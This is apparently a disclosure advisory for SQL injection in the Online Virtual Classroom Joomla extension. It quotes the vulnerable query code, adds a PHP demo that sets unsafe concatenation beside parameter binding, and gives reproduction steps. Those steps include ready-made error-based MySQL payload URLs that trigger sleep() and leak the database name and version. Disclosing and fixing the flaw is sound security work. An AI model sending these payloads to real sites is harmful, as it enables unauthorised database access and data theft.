Description
SQL injection is an attack technique used to exploit applications that construct SQL statements from user-supplied input. When it succeeds, the attacker can change the logic of the SQL statements executed against the database.
Structured Query Language (SQL) is a specialized language for sending queries to databases. SQL is both an ANSI and an ISO standard, though most database products that support it add proprietary extensions. Applications frequently build SQL statements from user-supplied data. If an application builds those statements by concatenation instead of escaping or parameter binding, an attacker can alter the statement structure and execute unplanned and potentially hostile commands. Those commands run in the context of the database user the application connects as, which gives the attacker control of every database resource accessible to that user, up to and including, where the database server permits it, executing commands on the hosting system.
The Online Virtual Classroom extension for Joomla (component com_virtualclassroom) builds SQL statements by concatenating request parameters into query strings, and an authenticated administrator-panel user can exploit this to inject arbitrary SQL into the extension's queries.
Root Cause Analysis
The file administrator/controller.php contains the following code at line 74:
74┆ $query="select id from #__virtualclassroom_teacher where user_id='".$value."' ";
$value is concatenated straight into the query text without escaping or parameter binding (#__ is Joomla's table-prefix placeholder, replaced with the site's prefix before execution), so a single quote in $value terminates the string literal and everything after it is parsed as SQL. The injected SQL executes with the privileges of the application's database user. The proof of concept below reaches one of these queries through the cid[] parameter of the unpublishuser task.
Similarly, there are other instances in the same file vulnerable to SQL injection:
95┆ $query="select id from #__virtualclassroom_teacher where user_id='".$value."' ";
321┆ $row = 'SELECT class_id FROM #__virtualclassroom_acl WHERE group_id="'.$gid.'"';
Line 321 wraps $gid in double quotes rather than single quotes, so there a double quote is the character that breaks out of the literal; the fix is the same in all three places.
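The concatenation pattern above beside a parameterised form, as an added example that is neither the extension's code nor its fix: it runs against an in-memory SQLite database through PHP's PDO so it executes without a Joomla install (assuming the pdo_sqlite extension is enabled); the table, its rows and the jos_ prefix standing in for the #__ placeholder are constructed here; and the payload uses a tautology instead of the advisory's MySQL-specific GTID_SUBSET()/sleep() expressions so that SQLite can parse it.

```php
<?php
declare(strict_types=1);

// Added example, not code from the Online Virtual Classroom extension.
// The vulnerable function mirrors the concatenation at line 74 of
// administrator/controller.php; the two safe functions show parameter
// binding and input validation. Table, rows and the "jos_" prefix are
// constructed for this demonstration (assumption: pdo_sqlite is available).

function setUpDatabase(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE jos_virtualclassroom_teacher (id INTEGER PRIMARY KEY, user_id INTEGER NOT NULL)');
    $db->exec('INSERT INTO jos_virtualclassroom_teacher (id, user_id) VALUES (1, 42), (2, 309), (3, 777)');
    return $db;
}

// Vulnerable: $value is spliced into the SQL text, so a quote inside it ends
// the string literal and whatever follows is parsed as SQL.
function lookupTeacherVulnerable(PDO $db, string $value): array
{
    $query = "select id from jos_virtualclassroom_teacher where user_id='" . $value . "' ";
    return $db->query($query)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened: the value travels as a bound parameter, separate from the SQL
// text, so the database only ever treats it as data to compare against.
function lookupTeacherBound(PDO $db, string $value): array
{
    $stmt = $db->prepare('SELECT id FROM jos_virtualclassroom_teacher WHERE user_id = :user_id');
    $stmt->execute([':user_id' => $value]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened and validated: cid[] carries record ids, so anything that is not
// an integer is rejected before any query is built. Returns null on rejection.
function lookupTeacherById(PDO $db, string $value): ?array
{
    if (filter_var($value, FILTER_VALIDATE_INT) === false) {
        return null;
    }
    $stmt = $db->prepare('SELECT id FROM jos_virtualclassroom_teacher WHERE user_id = :user_id');
    $stmt->bindValue(':user_id', (int) $value, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$db = setUpDatabase();

// A legitimate id, then a payload with the advisory's structure: the quote
// closes the literal, the injected condition rewrites the WHERE clause, and
// "-- " comments out the trailing quote the application appends.
$legitimate = '309';
$payload    = "309' OR 1=1-- x";

foreach (['vulnerable' => 'lookupTeacherVulnerable',
          'bound'      => 'lookupTeacherBound',
          'validated'  => 'lookupTeacherById'] as $label => $fn) {
    printf("%-10s legitimate=%s payload=%s\n",
        $label,
        json_encode($fn($db, $legitimate)),
        json_encode($fn($db, $payload)));
}
```

Run with php on the command line: the vulnerable lookup returns the single matching teacher for the legitimate id but every row for the payload, the bound lookup returns nothing for the payload because no user_id equals that literal string, and the validated lookup rejects it before a statement exists. In Joomla 3 the same separation is available through the database API: $db->quote($value) escapes and quotes a string value, $db->quoteName() quotes identifiers, and id arrays such as cid[] are normally cast with (int) or Joomla\Utilities\ArrayHelper::toInteger() before they go anywhere near a query; the #__ prefix is then substituted when the query is passed to $db->setQuery().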
CVSS Score: 8.8 (High)
Steps To Reproduce
Install Joomla 3.
Log in to the administrator panel with any user account.
Install the extension.
Request the endpoint /administrator/index.php?option=com_virtualclassroom&task=unpublishuser&cid[]=309%27%20AND%20GTID_SUBSET(CONCAT(0x7170717171,(SELECT%20(ELT(7062=7062,1))),sleep(10)),7062)--%20mIHZ; the injected sleep(10) delays the response by about 10 seconds, confirming the SQL injection.
Request the endpoint /administrator/index.php?option=com_virtualclassroom&task=unpublishuser&cid[]=309%27%20AND%20GTID_SUBSET(CONCAT(0x7170717171,(SELECT%20(ELT(7062=7062,1))),database()),7062)--%20mIHZ; the response discloses the database name.
Request the endpoint /administrator/index.php?option=com_virtualclassroom&task=unpublishuser&cid[]=309%27%20AND%20GTID_SUBSET(CONCAT(0x7170717171,(SELECT%20(ELT(7062=7062,1))),version()),7062)--%20mIHZ; the response discloses the database server version.
URL-decoded, the cid[] value in each request is 309' AND GTID_SUBSET(CONCAT(0x7170717171,(SELECT (ELT(7062=7062,1))),<expression>),7062)-- mIHZ. The leading ' closes the string literal around the id and the -- comments out the closing quote the application appends. GTID_SUBSET() is the MySQL error-based technique: the function rejects its malformed first argument with an error message that quotes that argument, so whatever <expression> evaluated to (sleep(10), database(), version() or any other subquery) is reflected in the error text, and 0x7170717171 is a fixed marker string for locating the value in the response. That the name and version appear in the response also shows the application surfaces raw database error text to the user.
Because any expression can be reflected this way, an attacker can dump the entire database accessible to the application's database user.
Affected extension: https://extensions.joomla.org/extension/online-virtual-classroom/
Video POC
https://github.com/braincert/Online-Virtual-Classroom/assets/51406427/51334160-d4b0-4c7d-9b81-90b0dcf4212c
The vulnerability was discovered in collaboration with @SivaPothuluru-Sajja.